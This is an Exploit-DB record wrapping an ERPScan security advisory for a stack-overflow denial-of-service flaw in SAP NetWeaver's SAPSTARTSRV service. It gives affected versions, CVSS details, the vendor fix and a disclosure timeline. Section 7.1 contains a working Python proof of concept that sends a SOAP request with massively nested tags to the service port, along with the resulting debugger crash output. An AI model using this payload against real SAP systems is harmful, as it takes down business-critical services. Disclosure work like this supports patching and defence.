{"id": "EDB-ID:40592", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "SAP NetWeaver KERNEL 7.0 < 7.5 - Denial of Service", "description": "", "published": "2016-10-20T00:00:00", "modified": "2016-10-20T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/40592", "reporter": "ERPScan", "references": [], "cvelist": [], "immutableFields": [], "lastseen": "2022-08-16T08:19:32", "viewCount": 13, "enchantments": {"score": {"value": 0.0, "vector": "NONE"}, "dependencies": {}, "backreferences": {"references": [{"type": "erpscan", "idList": ["ERPSCAN-16-030"]}]}, "exploitation": null, "vulnersScore": 0.0}, "_state": {"dependencies": 1661190352, "score": 1661184847}, "_internal": {"score_hash": "0382df5b152d5d0ece370b37544cd2b4"}, "sourceHref": "https://www.exploit-db.com/download/40592", "sourceData": "'''\r\nApplication: SAP NetWeaver KERNEL\r\n\r\nVersions Affected: SAP NetWeaver KERNEL 7.0-7.5\r\n\r\nVendor URL: http://SAP.com\r\n\r\nBugs: Denial of Service\r\n\r\nSent: 09.03.2016\r\n\r\nReported: 10.03.2016\r\n\r\nVendor response: 10.03.2016\r\n\r\nDate of Public Advisory: 12.07.2016\r\n\r\nReference: SAP Security Note 2295238\r\n\r\nAuthor: Dmitry Yudin (ERPScan)\r\n\r\n\r\n\r\nDescription\r\n\r\n\r\n1. ADVISORY INFORMATION\r\n\r\nTitle: [ERPSCAN-16-030] SAP NetWeaver \u2013 buffer overflow vulnerability\r\n\r\nAdvisory ID: [ERPSCAN-16-030]\r\n\r\nRisk: high\r\n\r\nAdvisory URL: https://erpscan.com/advisories/erpscan-16-030-sap-netweaver-sapstartsrv-stack-based-buffer-overflow/\r\n\r\nDate published: 12.10.2016\r\n\r\nVendors contacted: SAP\r\n\r\n\r\n2. 
VULNERABILITY INFORMATION\r\n\r\nClass: Denial of Service\r\n\r\nImpact: DoS\r\n\r\nRemotely Exploitable: yes\r\n\r\nLocally Exploitable: yes\r\n\r\n\r\n\r\nCVSS Information\r\n\r\nCVSS Base Score v3: 6.5 / 10\r\n\r\nCVSS Base Vector:\r\n\r\nAV : Attack Vector (Related exploit range) Network (N)\r\n\r\nAC : Attack Complexity (Required attack complexity) Low (L)\r\n\r\nPR : Privileges Required (Level of privileges needed to exploit) None (N)\r\n\r\nUI : User Interaction (Required user participation) None (N)\r\n\r\nS : Scope (Change in scope due to impact caused to components beyond\r\nthe vulnerable component) Unchanged (U)\r\n\r\nC : Impact to Confidentiality None (N)\r\n\r\nI : Impact to Integrity Low (L)\r\n\r\nA : Impact to Availability Low (L)\r\n\r\n\r\n\r\n3. VULNERABILITY DESCRIPTION\r\n\r\nThis vulnerability allows an attacker to send a special request to the\r\nSAPSTARTSRV process port and conduct stack buffer overflow (recursion)\r\non the SAP server.\r\n\r\n\r\n4. VULNERABLE PACKAGES\r\n\r\nSAP KERNEL 7.21 32-BIT 625\r\n\r\nSAP KERNEL 7.21 32-BIT UNICODE 625\r\n\r\nSAP KERNEL 7.21 64-BIT 625\r\n\r\nSAP KERNEL 7.21 64-BIT UNICODE 625\r\n\r\nSAP KERNEL 7.21 EXT 32-BIT 625\r\n\r\nSAP KERNEL 7.21 EXT 32-BIT UC 625\r\n\r\nSAP KERNEL 7.21 EXT 64-BIT 625\r\n\r\nSAP KERNEL 7.21 EXT 64-BIT UC 625\r\n\r\nSAP KERNEL 7.22 64-BIT 113\r\n\r\nSAP KERNEL 7.22 64-BIT UNICODE 113\r\n\r\nSAP KERNEL 7.22 EXT 64-BIT 113\r\n\r\nSAP KERNEL 7.22 EXT 64-BIT UC 113\r\n\r\nSAP KERNEL 7.42 64-BIT 412\r\n\r\nSAP KERNEL 7.42 64-BIT UNICODE 412\r\n\r\nSAP KERNEL 7.45 64-BIT 113\r\n\r\nSAP KERNEL 7.45 64-BIT UNICODE 113\r\n\r\n\r\n5. SOLUTIONS AND WORKAROUNDS\r\n\r\nTo correct this vulnerability, install SAP Security Note 2295238\r\n\r\n\r\n6. AUTHOR\r\n\r\nDmitry Yudin (ERPScan)\r\n\r\n\r\n7. TECHNICAL DESCRIPTION\r\n\r\n7.1. 
Proof of Concept\r\n'''\r\n\r\nimport socket\r\nPoC = \"\"\"<?xml version=\"1.0\" encoding=\"utf-8\"?>\r\n\r\n<SOAP-ENV:Envelope\r\nxmlns:SOAP-ENV=\"http://schemas.xmlsoap.org/soap/envelope/\"\r\nxmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\r\nxmlns:xs=\"http://www.w3.org/2001/XMLSchema\">\r\n <SOAP-ENV:Header>\r\n <sapsess:Session\r\nxlmns:sapsess=\"http://www.sap.com/webas/630/soap/features/session/\">\r\n> \"\"\" + \"<a>\" * 100000 + \"</a>\" * 100000 + \"\"\" </sapsess:Session>\r\n </SOAP-ENV:Header>\r\n <SOAP-ENV:Body>\r\n <ns1:WW xmlns:ns1=\"urn:SAPControl\">\r\n <b></b>\r\n <e><e>\r\n </ns1:WW>\r\n </SOAP-ENV:Body>\r\n</SOAP-ENV:Envelope>\"\"\"\r\n\r\nfor i in range(1,5):\r\n sock = socket.socket()\r\n sock.connect((\"SAP_IP\", SAP_PORT))\r\n sock.send(PoC)\r\n\r\n'''\r\nWindbg exceptions\r\n\r\nsapstartsrv!soap_getutf8+0xa:\r\n00000001`4009cd2a e891f9ffff call sapstartsrv!soap_get\r\n(00000001`4009c6c0)\r\n\r\nrax=0000000000000000 rbx=000000000bcdcfb0 rcx=000000000bcdcfb0\r\nrdx=0000000000000061 rsi=0000000000000000 rdi=000000000bcdcfb0\r\nrip=000000014009cd2a rsp=0000000002b93ff0 rbp=000000000bcdcfb0\r\nr8=0000000134936c69 r9=0000000000000000 r10=0000000000000000\r\nr11=000000014061ee28 r12=0000000000000000 r13=000000000000270f\r\nr14=00000001409f8ba0 r15=0000000000000000\r\niopl=0 nv up ei pl nz na po nc\r\ncs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206\r\n\r\n\r\n\r\n8. REPORT TIMELINE\r\n\r\nSent: 09.03.2016\r\n\r\nReported: 10.03.2016\r\n\r\nVendor response: 10.03.2016\r\n\r\nDate of Public Advisory: 12.07.2016\r\n\r\n\r\n\r\n9. REFERENCES\r\n\r\nhttps://erpscan.com/advisories/erpscan-16-030-sap-netweaver-sapstartsrv-stack-based-buffer-overflow/\r\n\r\n\r\n\r\n10. ABOUT ERPScan Research\r\n\r\nERPScan research team specializes in vulnerability research and\r\nanalysis of critical enterprise applications. 
It was acknowledged\r\nmultiple times by the largest software vendors like SAP, Oracle,\r\nMicrosoft, IBM, VMware, HP for discovering more than 400\r\nvulnerabilities in their solutions (200 of them just in SAP!).\r\n\r\nERPScan researchers are proud of discovering new types of\r\nvulnerabilities (TOP 10 Web Hacking Techniques 2012) and of the \"The\r\nBest Server-Side Bug\" nomination at BlackHat 2013.\r\n\r\nERPScan experts participated as speakers, presenters, and trainers at\r\n60+ prime international security conferences in 25+ countries across\r\nthe continents (e.g. BlackHat, RSA, HITB) and conducted private\r\ntrainings for several Fortune 2000 companies.\r\n\r\nERPScan researchers carry out the EAS-SEC project that is focused on\r\nenterprise application security awareness by issuing annual SAP\r\nsecurity research.\r\n\r\nERPScan experts were interviewed in specialized info-sec resources and\r\nfeatured in major media worldwide. Among them there are Reuters,\r\nYahoo, SC Magazine, The Register, CIO, PC World, DarkReading, Heise,\r\nChinabyte, etc.\r\n\r\nOur team consists of highly-qualified researchers, specialized in\r\nvarious fields of cybersecurity (from web application to ICS/SCADA\r\nsystems), gathering their experience to conduct the best SAP security\r\nresearch.\r\n\r\n11. ABOUT ERPScan\r\n\r\nERPScan is the most respected and credible Business Application\r\nCybersecurity provider. Founded in 2010, the company operates globally\r\nand enables large Oil and Gas, Financial, Retail and other\r\norganizations to secure their mission-critical processes. Named as an\r\n\u2018Emerging Vendor\u2019 in Security by CRN, listed among \u201cTOP 100 SAP\r\nSolution providers\u201d and distinguished by 30+ other awards, ERPScan is\r\nthe leading SAP SE partner in discovering and resolving security\r\nvulnerabilities. 
ERPScan consultants work with SAP SE in Walldorf to\r\nassist in improving the security of their latest solutions.\r\n\r\nERPScan\u2019s primary mission is to close the gap between technical and\r\nbusiness security, and provide solutions for CISOs to evaluate and\r\nsecure SAP and Oracle ERP systems and business-critical applications\r\nfrom both cyberattacks and internal fraud. As a rule, our clients are\r\nlarge enterprises, Fortune 2000 companies and MSPs, whose requirements\r\nare to actively monitor and manage security of vast SAP and Oracle\r\nlandscapes on a global scale.\r\n\r\nWe \u2018follow the sun\u2019 and have two hubs, located in Palo Alto and\r\nAmsterdam, to provide threat intelligence services, continuous support\r\nand to operate local offices and partner network spanning 20+\r\ncountries around the globe.\r\n\r\n\r\nAddress USA: 228 Hamilton Avenue, Fl. 3, Palo Alto, CA. 94301\r\n\r\nPhone: 650.798.5255\r\n\r\nTwitter: @erpscan\r\n\r\nScoop-it: Business Application Security\r\n'''", "osvdbidlist": [], "exploitType": "dos", "verified": false}